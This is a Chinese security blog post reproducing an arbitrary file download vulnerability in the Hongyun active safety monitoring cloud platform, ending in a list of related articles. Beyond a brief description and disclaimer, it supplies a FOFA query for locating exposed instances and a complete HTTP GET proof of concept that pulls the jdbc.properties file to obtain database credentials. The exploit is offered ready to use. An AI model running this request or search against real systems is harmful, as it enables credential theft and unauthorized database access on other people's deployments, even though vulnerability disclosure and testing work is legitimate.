鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]

文章目录

  • [鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]](#鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC])
    • [0x01 前言](#0x01 前言)
    • [0x02 漏洞描述](#0x02 漏洞描述)
    • [0x03 影响版本](#0x03 影响版本)
    • [0x04 漏洞环境](#0x04 漏洞环境)
    • [0x05 漏洞复现](#0x05 漏洞复现)

鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

0x03 影响版本

复制代码
鸿运主动安全监控云平台

0x04 漏洞环境

FOFA语法:body="./open/webApi.html"

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC (GET)

bash 复制代码
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh; style=1; maintitle=%u5317%u6597%u89C6%u9891%u8FD0%u8425%u5E73%u53F0; JSESSIONID=1B2F4E6550CE07CBA9EBE5533B00AE05
Connection: close

3.复现

可以发现数据的账户以及密码,可以进行登录连接数据库。

相关推荐
Codingwiz_Joy1 天前
Day43 PHP(mysql不同注入类型、mysql不同注入点、mysql传输不同数据类型 )
网络安全·php·安全性测试
独行soc1 天前
2025年渗透测试面试题总结-67(题目+回答)
网络·python·安全·web安全·网络安全·adb·渗透测试
emma羊羊1 天前
【SQL注入】延时盲注
数据库·sql·网络安全
安卓开发者1 天前
鸿蒙NEXT的Web组件网络安全与隐私保护实践
前端·web安全·harmonyos
儒道易行1 天前
【攻防实战】记一次攻防实战全流程
网络安全
KKKlucifer1 天前
国家网络安全通报中心:重点防范境外恶意网址和恶意 IP
tcp/ip·安全·web安全
wanhengidc1 天前
手机云服务是什么意思?
运维·网络·安全·游戏·智能手机
德迅云安全-小潘1 天前
网页防篡改技术:原理、应用与安全保障
web安全
TG_yilongcloud1 天前
阿里云国际代理:怎么保障数据库在凭据变更过程中的安全与稳定?
数据库·安全·阿里云·云计算
JialBro1 天前
S7-200 SMART PLC 安全全指南:配置、漏洞解析与复现防护
安全·plc·工控安全·西门子